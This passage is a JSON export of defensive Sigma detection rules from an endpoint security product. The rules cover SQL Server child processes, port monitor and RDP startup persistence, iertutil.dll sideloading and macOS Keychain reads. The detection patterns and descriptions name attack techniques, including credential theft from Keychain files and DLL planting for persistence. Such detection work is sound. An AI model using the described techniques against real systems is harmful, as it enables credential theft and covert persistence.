"rule_description": "Detects the execution of a suspicious PowerShell script containing cmdlets that may perform code injection.\nAttackers may use code injection to inject code into remote processes, aiming for privilege escalation, data theft or defense evasion.\nIt is recommended to investigate the PowerShell script in question, check for signs of code injection, review the executed command-line arguments, and analyze the process tree for any suspicious activity.\n",
"rule_creation_date": "2021-11-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1218",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88e5b7e0-e305-4e21-a287-03993926f06e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295263Z",
"creation_date": "2026-03-23T11:45:35.295267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295275Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_sqlservr_susp_child.yml",
"content": "title: Suspicious Process Executed by SQLServer\nid: 88e5b7e0-e305-4e21-a287-03993926f06e\ndescription: |\n Detects the execution of a suspicious process by SQLServer.\n Attackers may abuse built-in MSSQL Server functionalities in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\sqlservr.exe'\n Image|startswith: '?:\\' # Avoid detection on remote image\n\n # This is handled by the rule 48a4e8ec-4a97-4420-8fd1-9ce20191c569\n filter_cmd:\n Image:\n - '?:\\windows\\system32\\cmd.exe'\n - '?:\\windows\\syswow64\\cmd.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\WINDOWS\\system32\\WerFault.exe'\n - '?:\\WINDOWS\\syswow64\\WerFault.exe'\n\n exclusion_conhost:\n Image:\n - '?:\\WINDOWS\\system32\\conhost.exe'\n - '?:\\WINDOWS\\syswow64\\conhost.exe'\n CommandLine:\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_mssqltools:\n Image|endswith:\n - '\\Tools\\Binn\\\\*.exe'\n - '\\DTS\\Binn\\\\*.exe'\n - '\\COM\\\\*.exe'\n - '\\shared\\\\*.exe'\n - 'MSSQL\\\\Binn\\\\*.exe'\n - '\\LocalDB\\Binn\\\\*.exe'\n - '?:\\Windows\\WID\\Binn\\SqlDumper.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_mssqltools_unsigned:\n - Image:\n - '?:\\Program Files (x86)\\Microsoft SQL Server\\80\\Tools\\Binn\\DTSRun.exe'\n - '?:\\Program Files\\Microsoft SQL Server\\\\*\\Tools\\Binn\\DTSRun.exe'\n - Image|endswith: 'MSSQL\\Binn\\slssqlmaint.exe'\n ProcessDescription: 'LiteSpeed maintenance utility'\n\n exclusion_litespeed:\n - Image: '?:\\Program Files\\Quest Software\\LiteSpeed\\SQL Server\\Engine\\SQLLiteSpeedx64.exe'\n ProcessDescription: 'LiteSpeed Backup/Restore Engine'\n\n exclusion_pcaui:\n Image: '?:\\Windows\\System32\\pcaui.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88e5b7e0-e305-4e21-a287-03993926f06e",
"rule_name": "Suspicious Process Executed by SQLServer",
"rule_description": "Detects the execution of a suspicious process by SQLServer.\nAttackers may abuse built-in MSSQL Server functionalities in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88ec665f-3f70-4356-9ad5-87781eb00cbe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089119Z",
"creation_date": "2026-03-23T11:45:34.089121Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089126Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/010/"
],
"name": "t1547_010_persistence_port_monitors.yml",
"content": "title: Port Monitor Installed\nid: 88ec665f-3f70-4356-9ad5-87781eb00cbe\ndescription: |\n Detects the installation of a new port monitor on the system.\n Port Monitors are DLLs loaded and run by the print spooler service, spoolsv.exe, under SYSTEM level permissions on boot.\n Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation.\n It is recommended to investigate the process that performed the registry modification as well as the target DLL at the path in the registry details.\nreferences:\n - https://attack.mitre.org/techniques/T1547/010/\ndate: 2020/09/24\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.010\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\\\*\\Driver'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n filter_dword:\n Details|startswith: 'DWORD '\n\n filter_programfiles:\n - ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n # \\\\HOST\\C$\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\Printer\\AddClearUPrinter.exe\n - '\\\\\\*\\\\*\\Program Files (x86)\\'\n - '\\\\\\*\\\\*\\Program Files\\'\n - Details|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\spoolsv.exe'\n - '?:\\Windows\\System32\\PrintIsolationHost.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n - '?:\\Windows\\System32\\poqexec.exe'\n - '?:\\Windows\\ccmcache\\\\*\\setup.exe'\n\n exclusion_spoolsv:\n # spoolsv.exe installs a lot of printer drivers\n Image:\n - '?:\\windows\\system32\\spoolsv.exe'\n - '?:\\windows\\syswow64\\spoolsv.exe'\n\n exclusion_known_ports:\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\7-PDF Print Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Adobe PDF Port Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Adobe PDF Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\AppliDisVirtualPort\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Appmon\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\BlueFilesPrinter\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Bullzip PDF Print Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Client Printer Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Converter driver portmonitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\DipMon\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\EpsonNet Print Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Evolis TCP/IP Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\FollowMe Client Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\FollowMe Local Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\FRCX port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\HP Standard TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\HubMail\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\iXBusMonitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Kioware Language Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\KX Language Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Local Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\LPR Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\MI7Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Microsoft Shared Fax Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\MicroStrategy Image Printer Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\MIJ RLP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\NeeviaWT Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PaperCut TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PDF Architect 9 Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PDF995 Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\pdfcmon\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\PDFLogic Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Port redirigé\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\SC2 TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Seagull Network Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Seagull V3 Network Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\SRCIMonitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Standard TCP/IP Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Tun LPR Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\USB Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Virtual Port Monitor\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\WSD Port\\Driver'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Xerox XMP v3 Port Monitor\\Driver'\n\n exclusion_citrix:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Client Printer Port\\Driver'\n Details: 'cpmon.dll'\n\n exclusion_seagull:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Seagull Network Monitor\\Driver'\n Details: 'ssnetmon.d64'\n\n exclusion_hp:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\HP Standard TCP/IP Port\\Driver'\n Details: 'HpTcpMon.dll'\n\n exclusion_wildix:\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\Wildix FaxPort\\Driver'\n Details: 'wfaxport.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88ec665f-3f70-4356-9ad5-87781eb00cbe",
"rule_name": "Port Monitor Installed",
"rule_description": "Detects the installation of a new port monitor on the system.\nPort Monitors are DLLs loaded and run by the print spooler service, spoolsv.exe, under SYSTEM level permissions on boot.\nAdversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation.\nIt is recommended to investigate the process that performed the registry modification as well as the target DLL at the path in the registry details.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-11-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88f710f0-7169-45cc-a19f-9f64b6f35ff8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076364Z",
"creation_date": "2026-03-23T11:45:34.076366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076371Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/rdpwdstartupprograms.html",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_rdp_wds_startup_programs.yml",
"content": "title: RDP WDS StartupPrograms Set via Registry\nid: 88f710f0-7169-45cc-a19f-9f64b6f35ff8\ndescription: |\n Detects a modification in the registry related to the remote session startup programs.\n The registry value \"StartupPrograms\" can be used in order to launch applications (server side) after each RDP session creation.\n It is recommended to investigate the process that added the key as well as the registry value for malicious content.\nreferences:\n - https://persistence-info.github.io/Data/rdpwdstartupprograms.html\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2024/11/05\nmodified: 2025/03/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\StartupPrograms'\n\n exclusion_systancia:\n - Image: '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\adiservr.exe'\n - Details|contains:\n - 'AdisSUP'\n - 'AdisEzScanSrvCfgSession'\n\n exclusion_rdpclip:\n Details: 'rdpclip'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88f710f0-7169-45cc-a19f-9f64b6f35ff8",
"rule_name": "RDP WDS StartupPrograms Set via Registry",
"rule_description": "Detects a modification in the registry related to the remote session startup programs.\nThe registry value \"StartupPrograms\" can be used in order to launch applications (server side) after each RDP session creation.\nIt is recommended to investigate the process that added the key as well as the registry value for malicious content.\n",
"rule_creation_date": "2024-11-05",
"rule_modified_date": "2025-03-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8924468b-dfa0-4dc8-9a00-b9e81b890840",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080487Z",
"creation_date": "2026-03-23T11:45:34.080489Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080494Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iexplore.yml",
"content": "title: DLL Hijacking via iexplore.exe\nid: 8924468b-dfa0-4dc8-9a00-b9e81b890840\ndescription: |\n Detects potential Windows DLL Hijacking via iexplore.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n In this case, iertutil.dll doesn't directly exist in the Internet Explorer folder. Therefore, an attacker can plant a malicious iertutil.dll in this folder.\n This DLL will be loaded each time iexplore.exe is executed, but also by instantiating an object via the DCOM InternetExplorer.Application Class remotely, allowing attackers to start the payload remotely and achieve persistence.\n This DLL sideloading attack can also be used in a more classic way, by simply bundling the malicious DLL and the legitimate iexplore.exe inside the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iexplore.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\iertutil.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8924468b-dfa0-4dc8-9a00-b9e81b890840",
"rule_name": "DLL Hijacking via iexplore.exe",
"rule_description": "Detects potential Windows DLL Hijacking via iexplore.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nIn this case, iertutil.dll doesn't directly exist in the Internet Explorer folder. Therefore, an attacker can plant a malicious iertutil.dll in this folder.\nThis DLL will be loaded each time iexplore.exe is executed, but also by instantiating an object via the DCOM InternetExplorer.Application Class remotely, allowing attackers to start the payload remotely and achieve persistence.\nThis DLL sideloading attack can also be used in a more classic way, by simply bundling the malicious DLL and the legitimate iexplore.exe inside the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-09",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89253ec2-98e1-46bc-98df-5406a4a094db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628022Z",
"creation_date": "2026-03-23T11:45:34.628024Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628028Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_user_keychain_access_suspicious_process_macos.yml",
"content": "title: Suspicious Access to User's Keychain\nid: 89253ec2-98e1-46bc-98df-5406a4a094db\ndescription: |\n Detects a suspicious access to the user's Keychain files.\n Adversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2024/09/26\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_common_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_common_files:\n Kind: 'read'\n Path:\n - '/Users/*/Library/Keychains/*.keychain'\n - '/Users/*/Library/Keychains/*.keychain-db'\n ProcessImage|contains: '?'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n # process\n - '/osascript'\n\n selection_susp_process:\n ProcessImage: '/bin/cat'\n\n filter_bin:\n ProcessImage:\n - '/usr/bin/security'\n - '/usr/bin/ldapsearch'\n - '/usr/bin/codesign'\n\n exclusion_process_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/opt/homebrew/'\n\n exclusion_process_adobe:\n ProcessAncestors|contains: '/private/tmp/????????-????-????-????-?????????????/Creative Cloud Installer.app/Contents/MacOS/Install'\n\n exclusion_process_installer:\n ProcessAncestors|contains: '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service|'\n\n exclusion_process_terragrunt:\n ProcessImage: '/Users/*/.tgenv/versions/*/terragrunt'\n\n exclusion_folder_signed:\n ProcessImage|startswith: '/users/'\n ProcessSigned: 'true'\n\n adhoc_signed:\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n\n condition: all of selection_common_* and 1 of selection_susp_* and not 1 of filter_* and not 1 of exclusion_process_* and not (exclusion_folder_signed and not adhoc_signed)\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89253ec2-98e1-46bc-98df-5406a4a094db",
"rule_name": "Suspicious Access to User's Keychain",
"rule_description": "Detects a suspicious access to the user's Keychain files.\nAdversaries may access Keychain (or Keychain Services) to acquire sensitive information such as account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89345982-a93f-4606-a99c-932da482d27d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627398Z",
"creation_date": "2026-03-23T11:45:34.627400Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627404Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_hidden_file_execution.yml",
